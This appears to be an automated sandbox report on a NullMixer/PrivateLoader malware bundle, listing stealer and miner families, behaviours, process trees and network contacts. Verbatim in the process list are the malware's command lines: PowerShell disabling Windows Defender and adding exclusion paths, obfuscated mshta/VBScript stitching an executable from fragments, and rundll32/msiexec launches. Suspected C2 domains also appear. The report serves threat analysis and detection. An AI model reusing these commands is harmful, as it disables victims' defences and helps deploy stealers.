Analysis Overview
SHA256
31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f
Threat Level: Known bad
The file 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f was found to be: Known bad.
Malicious Activity Summary
Redline family
Privateloader family
Onlylogger family
Fabookie family
SectopRAT
Socelars family
xmrig
Vidar
Xmrig family
Raccoon family
Socelars payload
Vidar family
Detect Fabookie payload
SectopRAT payload
Raccoon Stealer V1 payload
Fabookie
NullMixer
RedLine
Sectoprat family
Nullmixer family
OnlyLogger
Gcleaner family
RedLine payload
Socelars
PrivateLoader
Raccoon
GCleaner
OnlyLogger payload
Vidar Stealer
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
ASPack v2.12-2.42
Drops Chrome extension
Looks up geolocation information via web service
Looks up external IP address via web service
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Program Files directory
Unsigned PE
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
NSIS installer
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious use of UnmapMainImage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 17:25
Signatures
Privateloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
5s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2684 -ip 2684
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 3076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 852
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 860
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 920
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 928
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 956
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1500 -ip 1500
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 988
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1016
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1140
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
